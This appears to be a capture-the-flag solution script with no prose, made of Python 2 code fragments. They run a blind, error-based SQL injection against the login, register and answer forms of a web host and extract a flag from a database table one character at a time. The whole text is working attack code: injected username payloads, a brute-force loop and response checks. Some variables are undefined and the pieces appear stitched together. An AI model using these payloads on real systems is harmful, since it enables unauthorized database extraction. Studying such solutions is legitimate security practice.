for i in range(1,50): i =str(i) for j in chars: j=ord(j) username = """decade'or if((ascii(substr((select flag from flag),%s,1))=%s), 1, pow(6,666666666666))#"""%(i,j) data = {'username': username, 'password' : 'aaa', } print username do_whlie = True while do_whlie: try: r=requests.post(url,data=data) #print r.status_code #print r.text if r.status_code == 200: do_whlie = False except Exception as e: print str(e) html = login_and_answer(username) #print html if 'Your grades is 0' not in html: result += chr(j) print result break #print r.text
def login_and_answer(username): do_whlie = True while do_whlie: try: url="http://210.32.4.20/login.php" data = {'username': username, 'password' : 'aaa', } s = requests.Session() r1 = s.post(url,data=data) #print r1.status_code #print r1.text url='http://210.32.4.20/answer.php' data = {'10.a':'on'} r2 = s.post(url,data=data) #print r2.status_code #print r2.text #exit() if r1.status_code == 200 and r2.status_code == 200: do_whlie = False except Exception as e: print str(e) return r2.text
# payload = "1' and if((ascii(substr((select flag from flag limit 0,1),1,1))={}),exp(~(select * from(select user())a)),1)#"
flag = "" for i in range(1,50): print "round: "+ str(i) for j in guess: print "[+]testing: "+j tmp = ord(j) payload = "1' and if((ascii(substr((select flag from flag),{},1))={}),exp(~(select * from(select user())a)),1)#" print payload.format(i,tmp) data1 = { "username" : payload.format(i,tmp), "password" : "aaa" } data2 = { "9.d":"on" } re = requests.session() tt=re.post(register_url,data=data1) re.post(login_url,data=data1) res = re.post(answer_url,data2) if "<script>alert('Your grades is 0');</script>" in res.text: flag = flag+j break print "flag: "+flag